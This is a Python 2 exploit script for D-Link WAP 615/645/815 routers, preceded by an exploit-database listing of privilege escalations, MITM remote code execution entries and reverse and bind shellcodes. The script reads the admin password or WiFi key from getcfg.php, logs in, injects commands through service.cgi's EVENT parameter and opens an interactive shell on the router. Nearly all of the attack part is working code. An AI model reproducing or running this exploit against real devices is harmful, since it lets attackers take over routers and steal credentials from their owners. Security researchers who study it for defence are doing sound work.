
31 changes to exploits/shellcodes MiniUPnP MiniUPnPc < 2.0 - Remote Denial of Service Android - Hardware Service Manager Arbitrary Service Replacement due to getpidcon Microsoft Windows - NTFS Owner/Mandatory Label Privilege Bypass Microsoft Windows - NtImpersonateAnonymousToken AC to Non-AC Privilege Escalation Microsoft Windows - NtImpersonateAnonymousToken LPAC to Non-LPAC Privilege Escalation Microsoft Windows SMB Server (v1/v2) - Mount Point Arbitrary Device Open Privilege Escalation macOS - 'process_policy' Stack Leak Through Uninitialized Field Microsoft Edge Chakra - 'AppendLeftOverItemsFromEndSegment' Out-of-Bounds Read Jungo Windriver 12.5.1 - Privilege Escalation Jungo Windriver 12.5.1 - Local Privilege Escalation Parity Browser < 1.6.10 - Bypass Same Origin Policy Python smtplib 2.7.11 / 3.4.4 / 3.5.1 - Man In The Middle StartTLS Stripping VideoCharge Studio 2.12.3.685 - 'GetHttpResponse()' MITM Remote Code Execution VideoCharge Studio 2.12.3.685 - 'GetHttpResponse()' Man In The Middle Remote Code Execution Granding MA300 - Traffic Sniffing MitM Fingerprint PIN Disclosure Granding MA300 - Traffic Sniffing Man In The Middle Fingerprint PIN Disclosure LabF nfsAxe 3.7 FTP Client - Stack Buffer Overflow (Metasploit) phpCollab 2.5.1 - Unauthenticated File Upload (Metasploit) eVestigator Forensic PenTester - MITM Remote Code Execution eVestigator Forensic PenTester - Man In The Middle Remote Code Execution BestSafe Browser - MITM Remote Code Execution BestSafe Browser - Man In The Middle Remote Code Execution SKILLS.com.au Industry App - MITM Remote Code Execution Virtual Postage (VPA) - MITM Remote Code Execution SKILLS.com.au Industry App - Man In The Middle Remote Code Execution Virtual Postage (VPA) - Man In The Middle Remote Code Execution Trend Micro OfficeScan 11.0/XG (12.0) - MITM Remote Code Execution Trend Micro OfficeScan 11.0/XG (12.0) - Man In The Middle Remote Code Execution SAP NetWeaver J2EE Engine 7.40 - SQL Injection D-Link Routers 
110/412/615/815 < 1.03 - 'service.cgi' Arbitrary Code Execution FreeBSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes) BSD/x86 - Reverse TCP Shell (192.168.2.33:6969/TCP) Shellcode (129 bytes) FreeBSD/x86 - Bind TCP Password Shell (4883/TCP) Shellcode (222 bytes) FreeBSD/x86 - Bind TCP Password /bin/sh Shell (4883/TCP) Shellcode (222 bytes) Cisco IOS - New TTY / Privilege Level To 15 / Reverse Virtual Terminal Shell (21/TCP) Shellcode Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes) Cisco IOS - New TTY / Privilege Level To 15 / No Password Shellcode HPUX - execve /bin/sh Shellcode (58 bytes) Cisco IOS - New TTY + Privilege Level To 15 + Reverse Virtual Terminal Shell (21/TCP) Shellcode Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes) Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode HP-UX - execve /bin/sh Shellcode (58 bytes) OpenBSD/x86 - execve /bin/sh Shellcode (23 Bytes) OpenBSD/x86 - execve /bin/sh Shellcode (23 bytes) ARM - Bind TCP Shell (0x1337/TCP) Shellcode ARM - Bind TCP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode ARM - ifconfig eth0 192.168.0.2 up Shellcode Linux/ARM - Bind TCP Shell (0x1337/TCP) Shellcode Linux/ARM - Bind TCP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode Linux/ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode FreeBSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes) FreeBSD/x86 - Bind TCP /bin/sh Shell (31337/TCP) + Fork Shellcode (111 bytes) Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 Bytes) Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 bytes) Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 Bytes) Windows 7 x86 - Bind TCP 
Shell (4444/TCP) Shellcode (357 bytes) Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 Bytes) Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 bytes) Linux/x86 - exceve /bin/sh Encoded Shellcode (44 Bytes) Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (0.0.0.0:4444/TCP) Null-Free Shellcode (112 bytes) FreeBSD/x86-64 - execve /bin/sh Shellcode (28 bytes) FreeBSD/x86-64 - Bind TCP Password (R2CBw0cr) /bin/sh Shell Shellcode (127 bytes) FreeBSD/x86 - execv(/bin/sh) Shellcode (23 bytes) FreeBSD/x86 - //sbin/pfctl -F all Shellcode (47 bytes) FreeBSD/x86 - Bind TCP /bin/sh Shell (41254/TCP) Shellcode (115 bytes) FreeBSD - reboot() Shellcode (15 Bytes) IRIX - execve(/bin/sh -c) Shellcode (72 bytes) IRIX - execve(/bin/sh) Shellcode (43 bytes) IRIX - Bind TCP /bin/sh Shell Shellcode (364 bytes) IRIX - execve(/bin/sh) Shellcode (68 bytes) IRIX - stdin-read Shellcode (40 bytes) Linux/ARM - execve(_/bin/sh__ NULL_ 0) Shellcode (34 bytes) Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes) Linux/x86 - Read /etc/passwd Shellcode (54 Bytes) Linux/x86 - Read /etc/passwd Shellcode (54 bytes) Linux/x86-64 - execve /bin/sh Shellcode (21 Bytes) Linux/x86-64 - execve /bin/sh Shellcode (21 bytes)
#!/usr/bin/python
# Exploit Title: D-Link WAP 615/645/815 < 1.03 service.cgi RCE
# Exploit Author: Cr0n1c
# Vendor Homepage: us.dlink.com
# Software Link: https://github.com/Cr0n1c/dlink_shell_poc/blob/master/dlink_auth_rce
# Version: 1.03
# Tested on: D-Link 815 v1.03
import argparse
import httplib
import random
import re
import requests
import string
import urllib2
# Patterns tried, in order, against the body returned by GET URL to pull a
# device/model name out of the HTML.  Each pattern has exactly one capture
# group, which is what dlink_detection() returns.
DLINK_REGEX = ['Product Page : <a href="http://support.dlink.com" target="_blank">(.*?)<',
               '<div class="modelname">(.*?)</div>',
               '<div class="pp">Product Page : (.*?)<a href="javascript:check_is_modified">'
               ]
def dlink_detection():
    """Fetch URL and return the device name matched by DLINK_REGEX.

    Reads the module globals URL and DLINK_REGEX.  Returns the first capture
    group of the first pattern that matches the response body, the string
    "Unknown Device" when no pattern matches, or False (after printing a
    reason) when the connection fails or the status code is not 200.
    """
    try:
        response = requests.get(URL, timeout=10.00)
    except requests.exceptions.ConnectionError:
        print("Error: Failed to connect to " + URL)
        return False

    if response.status_code != 200:
        print("Error: " + URL + " returned status code " + str(response.status_code))
        return False

    body = response.text
    for pattern in DLINK_REGEX:
        match = re.search(pattern, body)
        if match:
            # Every pattern carries exactly one group, so group(1) is the
            # same string findall()[0] would have produced.
            return match.group(1)

    print("Warning: Unable to detect device for " + URL)
    return "Unknown Device"
def create_session():
    """POST a plaintext login to URL/session.cgi and report whether it worked.

    Reads the module globals URL, PASSWORD and HEADER; the user name is fixed
    to "admin".  Returns True only when the response is HTTP 200 with reason
    "OK" and its body contains <RESULT>SUCCESS</RESULT>; otherwise prints a
    reason and returns False.
    """
    form = {
        "REPORT_METHOD": "xml",
        "ACTION": "login_plaintext",
        "USER": "admin",
        "PASSWD": PASSWORD,
        "CAPTCHA": "",
    }
    endpoint = URL + "/session.cgi"

    try:
        response = requests.post(endpoint, data=form, headers=HEADER)
    except requests.exceptions.ConnectionError:
        print("Error: Failed to access " + endpoint)
        return False

    if response.status_code != 200 or response.reason != "OK":
        print("Error: Did not recieve a HTTP 200")
        return False

    if re.search("<RESULT>SUCCESS</RESULT>", response.text) is None:
        print("Error: Did not get a success code")
        return False

    return True
def parse_results(result):
    """Print *result* minus its first 100 characters and return it unchanged.

    Only the display is trimmed; the caller gets the full string back.  What
    the dropped prefix contains is not established here — presumably framing
    emitted by service.cgi ahead of the command output (TODO confirm).
    """
    tail = result[100:]
    print(tail)
    return result
def send_post(command, print_res=True):
    # POST `command` to URL/service.cgi embedded in the EVENT parameter and
    # return the response body: through parse_results() when print_res is
    # set, raw otherwise.  Returns False after printing an error on any
    # failure.  Reads the module globals URL and HEADER.
    # "%26" is the URL-encoded form of "&".
    post_content = "EVENT=CHECKFW%26" + command + "%26"

    method = "POST"

    if URL.lower().startswith("https"):
        handler = urllib2.HTTPSHandler()
    else:
        handler = urllib2.HTTPHandler()

    opener = urllib2.build_opener(handler)
    request = urllib2.Request(URL + "/service.cgi", data=post_content, headers=HEADER)
    # Passing `data` already makes urllib2 issue a POST; this override is redundant.
    request.get_method = lambda: method

    try:
        connection = opener.open(request)
    except urllib2.HTTPError:
        print "Error: failed to connect to " + URL + "/service.cgi"
        return False
    # NOTE(review): urllib2 defines no HTTPSError.  An exception that is not an
    # HTTPError (e.g. URLError on a refused connection) reaches this clause,
    # whose expression then raises AttributeError instead of printing below.
    except urllib2.HTTPSError:
        print "Error: failed to connect to " + URL + "/service.cgi"
        return False

    if not connection.code == 200:
        print "Error: Recieved status code " + str(connection.code)
        return False

    attempts = 0

    # Retry the body read up to 5 times when the chunked response arrives
    # incomplete; `data` is only bound once a read succeeds.
    while attempts < 5:
        try:
            data = connection.read()
        except httplib.IncompleteRead:
            attempts += 1
        else:
            break

    if attempts == 5:
        print "Error: Chunking failed %d times, bailing." %attempts
        return False

    if print_res:
        return parse_results(data)
    else:
        return data
def start_shell():
    """Run an interactive prompt that hands every input line to send_post().

    Prints a fixed banner, then loops reading lines with the module global
    ROUTER_TYPE as the prompt until the user types "gtfo" (case-insensitive).
    Each other line is stripped of surrounding whitespace and passed as-is to
    send_post(); an empty line is forwarded too.
    """
    banner = [
        "+" + "-" * 80 + "+",
        "| Welcome to D-Link Shell" + (" " * 56) + "|",
        "+" + "-" * 80 + "+",
        "| This is a limited shell that exploits piss poor programming. I created this |",
        "| to give you a comfort zone and to emulate a real shell environment. You will |",
        "| be limited to basic busybox commands. Good luck and happy hunting. |",
        "|" + (" " * 80) + "|",
        "| To quit type 'gtfo'" + (" " * 60) + "|",
        "+" + "-" * 80 + "+\n\n",
    ]
    for line in banner:
        print(line)

    while True:
        cmd = raw_input(ROUTER_TYPE + "# ").strip()
        if cmd.lower() == "gtfo":
            return
        send_post(cmd)
def query_getcfg(param):
    """POST SERVICES=<param> to URL/getcfg.php and return the response text.

    Reads the module globals URL and HEADER.  Returns False (after printing
    a reason) when the connection fails, when the response is not HTTP 200
    with reason "OK", or when the body contains
    "<message>Not authorized</message>" — the script treats a device that
    rejects the request as not vulnerable.  Otherwise returns the raw body.
    """
    endpoint = URL + "/getcfg.php"
    try:
        response = requests.post(endpoint, data={"SERVICES": param}, headers=HEADER)
    except requests.exceptions.ConnectionError:
        print("Error: Failed to access " + endpoint)
        return False

    if response.status_code != 200 or response.reason != "OK":
        print("Error: Did not recieve a HTTP 200")
        return False

    # Plain substring test: the marker contains no regex metacharacters.
    if "<message>Not authorized</message>" in response.text:
        print("Error: Not vulnerable")
        return False

    return response.text
def attempt_password_find():
    # Try to recover a usable password from getcfg.php output (CWE-200
    # information disclosure): first DEVICE.ACCOUNT's <password>, then
    # WIFI's <key>.  Returns the string found, or False.  The main block
    # calls this before create_session(), so the request carries only the
    # random "uid" cookie from HEADER, not an authenticated session.
    # Going fishing in DEVICE.ACCOUNT looking for CWE-200 or no password
    data = query_getcfg("DEVICE.ACCOUNT")
    if not data:
        return False

    res = re.findall("<password>(.*?)</password>", data)
    # NOTE(review): res is a list, so comparing it with a str is always True;
    # the literal "=OoXxGgYy=" (presumably a placeholder the device substitutes
    # for the real value — TODO confirm) is therefore never filtered out here.
    if len(res) > 0 and res != "=OoXxGgYy=":
        return res[0]

    # Did not find it in first attempt
    data = query_getcfg("WIFI")
    if not data:
        return False

    res = re.findall("<key>(.*?)</key>", data)
    if len(res) > 0:
        return res[0]

    # All attempts failed, just going to return and wish best of luck!
    return False
if __name__ == "__main__":
    # Entry point: parse arguments, set the module globals the functions
    # above read (HEADER, URL, ROUTER_TYPE, PASSWORD), log in, probe, then
    # drop into start_shell().
    parser = argparse.ArgumentParser(description="D-Link 615/815 Service.cgi RCE")

    parser.add_argument("-p", "--password", dest="password", action="store", default=None,
                        help="Password for the router. If not supplied then will use blank password.")
    parser.add_argument("-u", "--url", dest="url", action="store", required=True,
                        help="[Required] URL for router (i.e. http://10.1.1.1:8080)")
    parser.add_argument("-x", "--attempt-exploit", dest="attempt_exploit", action="store_true", default=False,
                        help="If flag is set, will attempt CWE-200. If that fails, then will attempt to discover "
                        "wifi password and use it.")

    args = parser.parse_args()

    # Headers sent on every request: a "uid" cookie of ten random letters and
    # a Host header pinned to "localhost" regardless of the target.  Why the
    # device accepts these is not established in this file.
    HEADER = {"Cookie": "uid=" + "".join(random.choice(string.letters) for _ in range(10)),
              "Host": "localhost",
              "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
              }

    # The whole URL, path included, is lower-cased here.
    URL = args.url.lower().strip()

    if not URL.startswith("http"):
        URL = "http://" + URL

    ROUTER_TYPE = dlink_detection()

    # dlink_detection() returns False only on connection/status failure;
    # "Unknown Device" is truthy and continues.
    if not ROUTER_TYPE:
        print "EXITING . . ."
        exit()

    # Password precedence: -x without -p tries the CWE-200 lookup (falling
    # back to ""); otherwise an explicit -p wins; the default is "".
    if args.attempt_exploit and args.password is None:
        res = attempt_password_find()
        if res:
            PASSWORD = res
        else:
            PASSWORD = ""
        print "[+] Switching password to: " + PASSWORD
    elif args.password:
        PASSWORD = args.password
    else:
        PASSWORD = ""

    if not create_session():
        print "EXITING . . ."
        exit()

    # NOTE(review): send_post() returns False on failure and len(False) raises
    # TypeError, so a failed probe ends in a traceback rather than this message.
    if len(send_post("ls", False)) == 0:
        print "Appears this device [%s] is not vulnerable. EXITING . . ." %ROUTER_TYPE
        exit()

    start_shell()